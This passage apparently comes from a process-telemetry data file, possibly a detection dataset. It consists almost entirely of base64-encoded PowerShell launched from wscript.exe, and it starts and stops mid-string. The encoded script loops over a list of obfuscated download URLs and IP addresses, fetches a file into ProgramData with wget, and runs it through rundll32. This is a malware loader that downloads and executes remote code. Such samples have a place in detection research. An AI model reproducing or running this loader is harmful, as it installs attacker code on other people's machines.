FEAQQA0AEEARABNAEEATABnAEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAGMAQQBOAHcAQQA9ACIAOwAkAGQAaQBvAHMAYwBvAHIAZQBpAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATQBnAEEAMABBAEMANABBAE0AUQBBADUAQQBEAGcAQQBMAGcAQQB5AEEARABFAEEATQB3AEEAdgBBAEUAWQBBAGMAdwBBADQAQQBGAEEAQQBlAFEAQQB2AEEARwB3AEEAUgBRAEIARgBBAEUAVQBBAFIAZwBBADQAQQBBAD0APQBiAHoAVQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBOAHcAQQA1AEEAQwA4AEEAVQBBAEIAcwBBAEUAdwBBAE4AQQBCAHQAQQBGAFUAQQBMAHcAQgBuAEEARQBFAEEATQBBAEIAVQBBAEcAOABBAFMAQQBBAD0AYgB6AFUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE0AZwBBAHYAQQBIAE0AQQBNAEEAQgBCAEEAQwA4AEEAYwB3AEIANgBBAEUAZwBBAFUAdwBCAEkAQQBEAE0AQQBSAHcAQgBFAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQATABlAHAAcgBvAHQAaQBjAEYAaQBkAGQAbABpAGUAcwAgAGkAbgAgACQAZABpAG8AcwBjAG8AcgBlAGkAbgAgAC0AcwBwAGwAaQB0ACAAIgBiAHoAVQAiACkAIAB7ACQAQwBhAHMAcwBvAGMAawBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBnAEEANQBBAEMANABBAE0AZwBBAHkAQQBEAFkAQQBMAGcAQQB5AEEARABJAEEATQBBAEEAdQBBAEQARQBBAE8AUQBBADQAQQBBAD0APQBXAGEAegBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAVABBAEcARQBBAGIAZwBCAGgAQQBIAFEAQQBiAHcAQgB5AEEARwBrAEEAYwBnAEIAcABBAEgAVQBBAGIAUQBCAHoAQQBGAE0AQQBkAEEAQgB5AEEARwBFAEEAWQB3AEIAagBBAEcAZwBBAGEAUQBCAHUAQQBHADgAQQBMAGcAQgAyAEEARwBrAEEAYgBBAEIAcwBBAEcARQBBAGMAdwBBAD0AVwBhAHoAUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAEUAQQBMAGcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQAwAEEARABnAEEAIgA7ACQAUABlAGMAaABlAGQATABhAGQAeQBoAG8AbwBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBwAEEARwA0AEEAZABBAEIAbABBAEgASQBBAFkAdwBCAHAAQQBIAEEAQQBhAFEAQgBsAEEARwA0AEEAZABBAEEAdQBBAEgAQQBBAGEAUQBCAGoAQQBIAFEAQQBkAFEAQgB5AEEARwBVAEEAYwB3AEEAPQBDAHIARgBsAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIASABBAEcAawBBAFkAUQBCAHQAQQBHAEkAQQBaAFEAQgAxAEEASABnAEEATABnAEIAcQBBAEgAQQBBACIAOwAkAHUAbgBzAGUAZQBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBrAEEARwBFAEEAYwBnAEIAbABBAEcARQBBAGIAQQBCAHMAQQBGAFUAQQBiAGcAQgB3AEEARwBFAEEAYwBnAEIAcgBBAEcAVQBBAFoAQQBBAHUAQQBHAFEAQQBaAFEAQgB1AEEASABRAEEAWQBRAEIAcwBBAEEAPQA9AGUAQQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBRAEEANQBBAEMANABBAE0AZwBBADEAQQBEAFEAQQBMAGcAQQA0AEEARABRAEEATABnAEEAeABBAEQAUQBBAE4AdwBBAD0AZQBBAD0AdQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBjAFEAQgAxAEEARwBFAEEAYwBnAEIAcABBAEgATQBBAGQAQQBCAHoAQQBDADQAQQBZAHcAQgBoAEEARwBZAEEAWgBRAEEAPQAiADsAdAByAHkAIAB7ACQAQQBuAGkAcwBpAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAE0AQQBaAFEAQgB0AEEARwBrAEEAYwBBAEIAeQBBAEcAOABBAGIAZwBCAGwAQQBHADQAQQBaAFEAQgB6AEEASABNAEEAVQBBAEIAbwBBAEcAOABBAGIAZwBCAHYAQQBIAE0AQQBMAGcAQgB1AEEASABrAEEAWQB3AEEAPQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAZwBBAEwAZwBBAHgAQQBEAEUAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAdwBBAEMANABBAE0AUQBBADMAQQBEAFkAQQAiADsAJABSAGUAdAByAG8AbQBpAGcAcgBhAHQAaQBvAG4AUwBhAGwAdABpAHIAZQB3AGkAcwBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAdgBBAEcASQBBAGIAQQBCAHAAQQBHAGMAQQBZAFEAQgAwAEEARwBVAEEAWgBBAEIATgBBAEcAOABBAGMAZwBCADAAQQBHAEUAQQBiAEEAQgB6AEEAQwA0AEEAYwB3AEIAbwBBAEcAOABBAGQAdwBBAD0AIgA7ACQARQBsAGUAYwB0AHIAbwBsAHkAegBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AUQBBADQAQQBDADQAQQBNAFEAQQAzAEEARABZAEEATABnAEEAeABBAEQATQBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQA0AEEAQQA9AD0AIgA7ACQAbgBvAG4AbQBpAGwAaQB0AGEAbgB0AGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABMAGUAcAByAG8AdABpAGMARgBpAGQAZABsAGkAZQBzACkAKQA7AHcAZwBlAHQAIAAkAG4AbwBuAG0AaQBsAGkAdABhAG4AdABsAHkAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwASQBkAGUAbwBwAHIAYQB4AGkAcwB0AC4AUgB1AG0AaQBuAGEAdABpAHYAZQA7ACQARABhAG0AYQBzAGsAaQBuAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFUAQQBOAEEAQQB1AEEARABFAEEATwBRAEEAeABBAEMANABBAE0AZwBBADAAQQBEAEUAQQBMAGcAQQA1AEEARABjAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwASQBkAGUAbwBwAHIAYQB4AGkAcwB0AC4AUgB1AG0AaQBuAGEAdABpAHYAZQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQAxADcAMgA3ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARQBrAEEAWgBBAEIAbABBAEcAOABBAGMAQQBCAHkAQQBHAEUAQQBlAEEAQgBwAEEASABNAEEAZABBAEEAdQBBAEYASQBBAGQAUQBCAHQAQQBHAGsAQQBiAGcAQgBoAEEASABRAEEAYQBRAEIAMgBBAEcAVQBBAEwAQQBCADIAQQBHAGsAQQBjAEEAQgB6AEEARABzAEEAYwB3AEIAcwBBAEcARQBBAFkAdwBCAHIAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEAIgA7ACQAcwB1AG0AbQBpAG4AZwBzAFAAbwBsAGwAZQByAGEAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAegBBAEgAUQBBAGQAUQBCAGgAQQBIAEkAQQBkAEEAQgBwAEEARwBFAEEAUQB3AEIAaABBAEgASQBBAFoAQQBCADEAQQBHAFUAQQBiAEEAQgBwAEEASABNAEEATABnAEIAMwBBAEcAOABBAGMAZwBCAHIAQQBBAD0APQBKAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB3AEEARwA4AEEAYQBRAEIAcgBBAEcAawBBAGIAQQBCAHYAQQBHAEkAQQBiAEEAQgBoAEEASABNAEEAZABBAEEAdQBBAEcATQBBAGIAdwBCADEAQQBIAEkAQQBjAHcAQgBsAEEASABNAEEAIgA7ACQAdABvAGcAbABlAHMAcwBDAG8AcgBuAGMAcgBhAGsAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCAGgAQQBIAEEAQQBhAEEAQgA1AEEARwB3AEEAYQBRAEIAdQBBAEcAVQBBAFYAQQBCAG8AQQBHAGsAQQBiAFEAQgBpAEEARwB3AEEAWgBRAEIAdABBAEcARQBBAGIAZwBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQQA9AD0AIgA7ACQAZwBsAHUAZQBtAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUQBBAEgASQBBAFoAUQBCADAAQQBIAEkAQQBZAFEAQgB1AEEASABNAEEAWQBRAEIAagBBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBTAGcAQgBoAEEASABJAEEAWgB3AEIAdgBBAEcAOABBAGIAZwBCAHoAQQBDADQAQQBZAHcAQgB2AEEARwA0AEEAZABBAEIAeQBBAEcARQBBAFkAdwBCADAAQQBHADgAQQBjAGcAQgB6AEEAQQA9AD0AZAB0AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAxAEEARABJAEEATABnAEEAeABBAEQAWQBBAE0AdwBBAHUAQQBEAEkAQQBNAGcAQQA0AEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAJABTAHUAcgBhAGQAZABpAHQAaQBvAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFQAQQBHAGcAQQBhAFEAQgB1AEEASABRAEEAYgB3AEIAcABBAEgATQBBAGQAQQBCAEoAQQBIAE0AQQBiAHcAQgB0AEEARwBVAEEAYwBnAEIAdgBBAEcAMABBAGIAdwBCAHkAQQBIAEEAQQBhAEEAQgBwAEEASABNAEEAYgBRAEEAdQBBAEcATQBBAGIAdwBCAHQAQQBHADAAQQBkAFEAQgB1AEEARwBrAEEAZABBAEIANQBBAEEAPQA9AFcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgB3AEEAdwBBAEMANABBAE0AZwBBADEAQQBEAFUAQQBMAGcAQQB4AEEARABRAEEATgBnAEEAdQBBAEQARQBBAE8AUQBBADIAQQBBAD0APQBXAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQATQBBAE4AQQBBAHUAQQBEAGsAQQBNAEEAQQB1AEEARABZAEEATgBnAEEAdQBBAEQAZwBBAE8AUQBBAD0AVwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHAEUAQQBiAGcAQgAwAEEARwBrAEEAYwB3AEIAcABBAEcARQBBAEwAZwBCADEAQQBIAE0AQQAiADsAJABpAGIAdQBwAHIAbwBmAGUAbgBEAGUAcgBlAGcAdQBsAGEAdABpAG8AbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBjAEEAZABRAEIAaQBBAEcAVQBBAGMAZwBCAHUAQQBHAEUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAagBBAEcARQBBAFoAZwBCAGwAQQBBAD0APQBGAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGIAdwBCAHMAQQBIAGsAQQBjAEEAQgBvAEEARwA4AEEAYgBnAEIAcABBAEgATQBBAGIAUQBCAEMAQQBHAHcAQQBaAFEAQgB3AEEARwBnAEEAWQBRAEIAeQBBAEcAOABBAGMAQQBCAG8AQQBIAFEAQQBhAEEAQgBoAEEARwB3AEEAYgBRAEIAcABBAEcARQBBAEwAZwBCAG8AQQBHADgAQQBjAGcAQgB6AEEARwBVAEEARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEoAQQBHADQAQQBjAHcAQgAwAEEARwBrAEEAZABBAEIAMQBBAEgAUQBBAFoAUQBCAHkAQQBIAE0AQQBVAHcAQgB0AEEARwA4AEEAYQB3AEIAbABBAEgATQBBAEwAZwBCAGkAQQBHAEUAQQBiAGcAQgBrAEEAQQA9AD0AIgA7AH0AfQAkAFYAaQB0AHQAbABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMgBBAEQAQQBBAEwAZwBBAHkAQQBEAEUAQQBOAHcAQQB1AEEARABZAEEATwBRAEEAdQBBAEQASQBBAE0AdwBBAHgAQQBBAD0APQBvAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQAwAEEAWgBRAEIAegBBAEcAMABBAFoAUQBCAHkAQQBHAGsAQQBjAHcAQgBsAEEAQwA0AEEAWgBnAEIAaABBAEcAawBBAGIAQQBBAD0AbwBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE8AUQBBAHUAQQBEAEUAQQBOAGcAQQA1AEEAQwA0AEEATgBnAEEANQBBAEMANABBAE0AZwBBAHoAQQBEAEkAQQBvAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATQBnAEEAdQBBAEQARQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQB4AEEARABZAEEATABnAEEAeABBAEQAYwBBAE8AQQBBAD0AIgA7ACQAbQBpAGMAcgBvAHAAaABhAGcAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AZwBBAHcAQQBDADQAQQBOAGcAQQB5AEEAQwA0AEEATQBRAEEAMgBBAEQAQQBBAEwAZwBBAHkAQQBEAEkAQQBOAGcAQQA9AHEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBZAEEAWQBRAEIAdABBAEcAawBBAGIAQQBCAHAAQQBHAEUAQQBjAGcAQgBwAEEASABRAEEAZQBRAEEAdQBBAEcAUQBBAGIAdwBCADMAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAPQAiADsA"
parent_process	wscript.exe	martian_process	powershell -encodedcommand "JABIAG8AbABpAHMAdABBAGMAeQBsAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATwBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBNAGcAQQB3AEEARABrAEEATABnAEEAeQBBAEQAQQBBAE8AUQBBAD0ARwBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE4AdwBBAHUAQQBEAEUAQQBOAGcAQQAxAEEAQwA0AEEATQBRAEEANQBBAEQAawBBAEwAZwBBAHgAQQBEAGMAQQBNAHcAQQA9ACIAOwAkAG4AaQBiAG8AbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAMwBBAEMANABBAE4AUQBBAHkAQQBDADQAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEAdwBBAEQAZwBBAFIARQBLAGwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABVAEEATQBRAEEAdQBBAEQARQBBAE0AZwBBADMAQQBDADQAQQBNAFEAQQAzAEEARABnAEEATABnAEEAeABBAEQASQBBAE0AdwBBAD0AUgBFAEsAbABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBiAHcAQgBwAEEASABJAEEAWQBRAEIAcABBAEYAQQBBAGMAZwBCAGwAQQBIAEEAQQBkAFEAQgB3AEEARwBFAEEAYgBBAEEAdQBBAEcANABBAGQAUQBBAD0AIgA7ACQAWQBhAGsAbwBuAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGsAQQBHAGsAQQBjAHcAQgB6AEEASABVAEEAWQBRAEIAawBBAEcARQBBAFkAZwBCAHMAQQBIAGsAQQBMAGcAQgBwAEEARwA0AEEAYQB3AEEAPQB5AHQAZQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBNAHcAQQB1AEEARABFAEEATgBBAEEAMABBAEMANABBAE4AQQBBAHcAQQBDADQAQQBOAGcAQQB3AEEAQQA9AD0AIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEANQA7ACQAYQBzAGUAYwByAGUAdABvAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAFkAUQBCAHMAQQBHAHcAQQBiAHcAQgAzAEEARgBJAEEAWQBRAEIAawBBAEcAawBBAGIAdwBCAHMAQQBHAGsAQQBkAEEAQgBsAEEAQwA0AEEAWgBRAEIANABBAEgAQQBBAGIAdwBCAHoAQQBHAFUAQQBaAEEAQQA9ACIAOwAkAGQAbwBlAGwAaQBuAGcAQQByAGMAaABvAHYAZQByAHMAZQBlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBHADgAQQBjAHcAQgB0AEEARwA4AEEAWQB3AEIAeQBBAEcARQBBAGQAQQBBAHUAQQBIAFkAQQBhAFEAQgBoAEEARwBvAEEAWgBRAEIAegBBAEEAPQA9ACIAOwAkAGgAaQBiAGkAcwBjAHUAcwBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBNAFEAQQB1AEEARABFAEEATgBnAEEAdwBBAEMANABBAE8AUQBBAHkAQQBDADQAQQBNAFEAQQA1AEEARABJAEEAYQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHIAQQBHAEUAQQBhAFEAQgAyAEEARwBFAEEAYgBBAEIANQBBAEcARQBBAEwAZwBCAHAAQQBHADQAQQBhAHcAQQA9AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBCAEEASABNAEEAWgBRAEIAcwBBAEcAdwBBAFkAUQBCADAAQQBHAFUAQQBSAFEAQgB0AEEASABBAEEAYQBBAEIAbABBAEcAMABBAFoAUQBCAHkAQQBHAEUAQQBiAEEAQgB1AEEARwBVAEEAYwB3AEIAegBBAEMANABBAFkAdwBCAHYAQQBIAFUAQQBiAGcAQgAwAEEASABJAEEAZQBRAEEAPQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA0AEEARABNAEEATABnAEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAGMAQQBOAHcAQQA9ACIAOwAkAGQAaQBvAHMAYwBvAHIAZQBpAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATQBnAEEAMABBAEMANABBAE0AUQBBADUAQQBEAGcAQQBMAGcAQQB5AEEARABFAEEATQB3AEEAdgBBAEUAWQBBAGMAdwBBADQAQQBGAEEAQQBlAFEAQQB2AEEARwB3AEEAUgBRAEIARgBBAEUAVQBBAFIAZwBBADQAQQBBAD0APQBiAHoAVQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBOAHcAQQA1AEEAQwA4AEEAVQBBAEIAcwBBAEUAdwBBAE4AQQBCAHQAQQBGAFUAQQBMAHcAQgBuAEEARQBFAEEATQBBAEIAVQBBAEcAOABBAFMAQQBBAD0AYgB6AFUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE0AZwBBAHYAQQBIAE0AQQBNAEEAQgBCAEEAQwA4AEEAYwB3AEIANgBBAEUAZwBBAFUAdwBCAEkAQQBEAE0AQQBSAHcAQgBFAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQATABlAHAAcgBvAHQAaQBjAEYAaQBkAGQAbABpAGUAcwAgAGkAbgAgACQAZABpAG8AcwBjAG8AcgBlAGkAbgAgAC0AcwBwAGwAaQB0ACAAIgBiAHoAVQAiACkAIAB7ACQAQwBhAHMAcwBvAGMAawBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBnAEEANQBBAEMANABBAE0AZwBBAHkAQQBEAFkAQQBMAGcAQQB5AEEARABJAEEATQBBAEEAdQBBAEQARQBBAE8AUQBBADQAQQBBAD0APQBXAGEAegBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAVABBAEcARQBBAGIAZwBCAGgAQQBIAFEAQQBiAHcAQgB5AEEARwBrAEEAYwBnAEIAcABBAEgAVQBBAGIAUQBCAHoAQQBGAE0AQQBkAEEAQgB5AEEARwBFAEEAWQB3AEIAagBBAEcAZwBBAGEAUQBCAHUAQQBHADgAQQBMAGcAQgAyAEEARwBrAEEAYgBBAEIAcwBBAEcARQBBAGMAdwBBAD0AVwBhAHoAUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAEUAQQBMAGcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQAwAEEARABnAEEAIgA7ACQAUABlAGMAaABlAGQATABhAGQAeQBoAG8AbwBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBwAEEARwA0AEEAZABBAEIAbABBAEgASQBBAFkAdwBCAHAAQQBIAEEAQQBhAFEAQgBsAEEARwA0AEEAZABBAEEAdQBBAEgAQQBBAGEAUQBCAGoAQQBIAFEAQQBkAFEAQgB5AEEARwBVAEEAYwB3AEEAPQBDAHIARgBsAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIASABBAEcAawBBAFkAUQBCAHQAQQBHAEkAQQBaAFEAQgAxAEEASABnAEEATABnAEIAcQBBAEgAQQBBACIAOwAkAHUAbgBzAGUAZQBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBrAEEARwBFAEEAYwBnAEIAbABBAEcARQBBAGIAQQBCAHMAQQBGAFUAQQBiAGcAQgB3AEEARwBFAEEAYwBnAEIAcgBBAEcAVQBBAFoAQQBBAHUAQQBHAFEAQQBaAFEAQgB1AEEASABRAEEAWQBRAEIAcwBBAEEAPQA9AGUAQQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBRAEEANQBBAEMANABBAE0AZwBBADEAQQBEAFEAQQBMAGcAQQA0AEEARABRAEEATABnAEEAeABBAEQAUQBBAE4AdwBBAD0AZQBBAD0AdQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBjAFEAQgAxAEEARwBFAEEAYwBnAEIAcABBAEgATQBBAGQAQQBCAHoAQQBDADQAQQBZAHcAQgBoAEEARwBZAEEAWgBRAEEAPQAiADsAdAByAHkAIAB7ACQAQQBuAGkAcwBpAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAE0AQQBaAFEAQgB0AEEARwBrAEEAYwBBAEIAeQBBAEcAOABBAGIAZwBCAGwAQQBHADQAQQBaAFEAQgB6AEEASABNAEEAVQBBAEIAbwBBAEcAOABBAGIAZwBCAHYAQQBIAE0AQQBMAGcAQgB1AEEASABrAEEAWQB3AEEAPQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAZwBBAEwAZwBBAHgAQQBEAEUAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAdwBBAEMANABBAE0AUQBBADMAQQBEAFkAQQAiADsAJABSAGUAdAByAG8AbQBpAGcAcgBhAHQAaQBvAG4AUwBhAGwAdABpAHIAZQB3AGkAcwBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAdgBBAEcASQBBAGIAQQBCAHAAQQBHAGMAQQBZAFEAQgAwAEEARwBVAEEAWgBBAEIATgBBAEcAOABBAGMAZwBCADAAQQBHAEUAQQBiAEEAQgB6AEEAQwA0AEEAYwB3AEIAbwBBAEcAOABBAGQAdwBBAD0AIgA7ACQARQBsAGUAYwB0AHIAbwBsAHkAegBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AUQBBADQAQQBDADQAQQBNAFEAQQAzAEEARABZAEEATABnAEEAeABBAEQATQBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQA0AEEAQQA9AD0AIgA7ACQAbgBvAG4AbQBpAGwAaQB0AGEAbgB0AGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABMAGUAcAByAG8AdABpAGMARgBpAGQAZABsAGkAZQBzACkAKQA7AHcAZwBlAHQAIAAkAG4AbwBuAG0AaQBsAGkAdABhAG4AdABsAHkAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwASQBkAGUAbwBwAHIAYQB4AGkAcwB0AC4AUgB1AG0AaQBuAGEAdABpAHYAZQA7ACQARABhAG0AYQBzAGsAaQBuAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFUAQQBOAEEAQQB1AEEARABFAEEA